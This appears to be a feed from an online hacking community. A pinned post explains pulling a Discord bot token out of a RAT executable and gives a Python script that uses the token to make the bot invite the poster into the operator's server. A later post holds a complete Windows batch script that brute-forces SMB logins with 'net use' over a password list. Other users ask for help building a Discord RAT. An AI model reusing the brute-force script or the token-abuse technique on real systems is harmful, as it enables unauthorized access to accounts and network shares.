Write something
Pinned
Feb 28 in
For the people who don't like Discord Bot RAT's
I started coding with VB.Net almost 18 years ago - by that I'm surely a lot older than the rest in here. I usually don't deal with that stuff, especially the low quality crap floating around for free - or even worse being sold out there. A thing I've recently found was a RAT, that is NOT controlled by a panel, instead the actor is using a discord bot and monitoring the connection with slash commands. I'm not one of those active discord users, anyways I knew enough about their API to "exploit" the bot and abuse the fact that they use discord. The Idea: Reverse engineering the Bot token such as the actor's server id out of the malicious executable and abusing the bot In the first picture you can already see the bot token and Server-ID. As imagined, the developers didn't put much afford into protecting it so this got no security at all. And that's already enough information, time to think about a second step. You can of course spam the bot, but it's more funny to make the bot invite us to the server. My python skills are really bad, but the script works: import discord from discord.ext import commands intents = discord.Intents.default() bot = commands.Bot(command_prefix='!', intents=intents) @bot.event async def on_ready(): print(f'{bot.user} connected') server = bot.get_guild(int('')) invite_link = await server.text_channels[0].create_invite(max_age=0) print(f'{invite_link}') bot.run('') If there are any issues feel free to ask for help, someone will possibly help you They ended up banning me, but don't forget, since the discord bot is creating a channel for every victim it got administrator permissions which are enough to make a script that unbans you import discord from discord.ext import commands intents = discord.Intents.default() bot = commands.Bot(command_prefix='!', intents=intents) @bot.event async def on_ready(): print(f'{bot.user} connected')
35
35
New comment Aug 22
Pinned
Feb 16 in
📜 Community Rules 📜
1. No Spamming Posts 2. No Swearing/Slurs 3. No Harassing Other Members 4. No Hacking 5. No Sending Malicious Files/Links 6. No Promo Failure To Abide By These Rules Will Result In a Warning then Instant Ban
65
20
New comment Sep 13
Sep 14 in
Can anyone send me tools?
I am thinking making about a crazy multitool-terminal combination, with many tools to choose from. can anyone send me tools?
1
2
New comment Sep 14
Sep 14 in
SMB
hi guys, I was trying the SMB bruteforce, only that every time I use it it tells me that the password was not found, but I'm sure I put it on the passlist and that it's right, some help? here che source: REM SETUP @echo off title SMB Bruteforce - by Sam1093k mode con cols=120 lines=30 chcp 65001 >nul cls CALL :LOGO pause >nul REM LOGO :LOGO echo. echo. echo [38;5;22m██████ ███▄ ▄███▓ ▄▄▄▄[0m echo [38;5;22m▒██ ▒ ▓██▒▀█▀ ██▒▓█████▄[0m echo [38;5;22m░ ▓██▄ ▓██ ▓██░▒██▒ ▄██[0m echo [38;5;22m▒ ██▒▒██ ▒██ ▒██░█▀[0m echo [38;5;22m▒██████▒▒▒██▒ ░██▒░▓█ ▀█▓[0m echo [38;5;22m▒ ▒▓▒ ▒ ░░ ▒░ ░ ░░▒▓███▀▒[0m echo [38;5;22m░ ░▒ ░ ░░ ░ ░▒░▒ ░[0m echo [38;5;22m░ ░ ░ ░ ░ ░ ░[0m echo [38;5;22m░ ░ ░[0m echo [38;5;22m░[0m echo. echo. color A set /p ip="Enter IP Address: " set /p user="Enter Username: " set /p wordlist="Enter Password List: " set /a count=1 for /f %%a in (%wordlist%) do ( set pass=%%a call :attempt ) echo Password not Found :( pause exit :success echo. echo Password Found! %pass% net use \\%ip% /d /y >nul 2>&1 pause exit :attempt net use \\%ip% /user:%user% %pass% >nul 2>&1 echo [ATTEMPT %count%] [%pass%] set /a count=%count%+1 if %errorlevel% EQU 0 goto success
0
18
New comment Sep 14
Sep 14 in
Who here is nice enough to help me
I wanna do the docord rat thing but when I went to build it it didn't work cause I'm using a bad laptop so if anyone can help me by making a server then adding me into it with all the stuff that'll be great
0
12
New comment Sep 14
1-30 of 795
Leaderboard (30-day)
1
+58
2
+15
3
+10
4
+10
5
+10
powered by